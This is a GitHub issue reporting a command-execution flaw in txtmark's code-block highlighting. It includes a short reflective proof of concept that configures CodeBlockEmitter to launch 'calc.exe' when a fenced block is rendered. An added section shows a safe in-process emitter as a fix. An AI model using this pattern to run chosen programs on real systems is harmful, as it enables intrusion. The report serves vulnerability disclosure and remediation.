rjeschke / txtmark

Yet another markdown processor for the JVM
Apache License 2.0

There's a code injection vulnerability of `com.github.rjeschke.txtmark.cmd.HlUtils.highlight` #60

Open LetianYuan opened 1 year ago

LetianYuan commented 1 year ago

com.github.rjeschke.txtmark.cmd.HlUtils.highlight is designed to highlight code blocks. However, passing an unchecked argument to this API can lead to the execution of arbitrary commands. For instance, first, we create an instance of CodeBlockEmitter and set the `program` parameter of CodeBlockEmitter to "calc.exe":

import java.lang.reflect.Constructor;
import com.github.rjeschke.txtmark.BlockEmitter;
import com.github.rjeschke.txtmark.Configuration;
import com.github.rjeschke.txtmark.Processor;

Configuration.Builder builder = Configuration.builder();
Class<?> clazz = Class.forName("com.github.rjeschke.txtmark.cmd.CodeBlockEmitter");
Constructor<?> constructor = clazz.getDeclaredConstructors()[0];
constructor.setAccessible(true);
Object cb = constructor.newInstance("UTF-8", "calc.exe");

Second, we set CodeBlockEmitter to the instance that we just created.

// Install the reflectively built emitter and enable fenced code blocks
builder.setCodeBlockEmitter((BlockEmitter) cb);
builder.forceExtentedProfile();
Configuration config = builder.build();
// Rendering a fenced code block drives the configured emitter
System.out.println(Processor.process("```java\n123\n```\n", config));

Finally, the malicious program "calc.exe" would be executed.
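The same processor configured with a code-block emitter that does no external highlighting at all, as an added example (not code from the reporter or from the txtmark project): it escapes block contents in-process and reduces the fence info string to a conservative token, so no configuration or document value can select a program to run. It assumes the BlockEmitter interface has the signature emitBlock(StringBuilder, List<String>, String) and uses the same Builder calls as the report; the input string is constructed.

```java
import java.util.List;
import com.github.rjeschke.txtmark.BlockEmitter;
import com.github.rjeschke.txtmark.Configuration;
import com.github.rjeschke.txtmark.Processor;

// An emitter that never spawns a process: block contents are HTML-escaped
// in-process and the fence info string becomes a plain class-name token.
public final class SafeCodeBlockEmitter implements BlockEmitter {
    // Assumption: called for every code block, `meta` being the fence info string
    @Override
    public void emitBlock(StringBuilder out, List<String> lines, String meta) {
        String lang = sanitizeLang(meta);
        out.append("<pre><code");
        if (!lang.isEmpty()) {
            out.append(" class=\"language-").append(lang).append('"');
        }
        out.append('>');
        for (String line : lines) {
            out.append(escapeHtml(line)).append('\n');
        }
        out.append("</code></pre>\n");
    }

    // Keep only a leading run of [a-z0-9+-] (max 20 chars); any other character ends the token
    static String sanitizeLang(String meta) {
        if (meta == null) return "";
        StringBuilder sb = new StringBuilder();
        for (char c : meta.trim().toLowerCase().toCharArray()) {
            boolean ok = (c >= 'a' && c <= 'z') || (c >= '0' && c <= '9') || c == '+' || c == '-';
            if (!ok || sb.length() == 20) break;
            sb.append(c);
        }
        return sb.toString();
    }

    static String escapeHtml(String s) {
        return s.replace("&", "&amp;").replace("<", "&lt;")
                .replace(">", "&gt;").replace("\"", "&quot;");
    }

    public static void main(String[] args) {
        Configuration.Builder builder = Configuration.builder();
        builder.setCodeBlockEmitter(new SafeCodeBlockEmitter());
        builder.forceExtentedProfile();
        Configuration config = builder.build();
        // Constructed input: trailing junk on the fence line and markup inside the block
        System.out.println(Processor.process("```java <b>\nint x = 1 < 2;\n```\n", config));
    }
}
```

With this emitter the fence line above yields `class="language-java"` and the `<` in the block is rendered as `&lt;`; no command is ever executed, whatever the fence line or the Configuration contains.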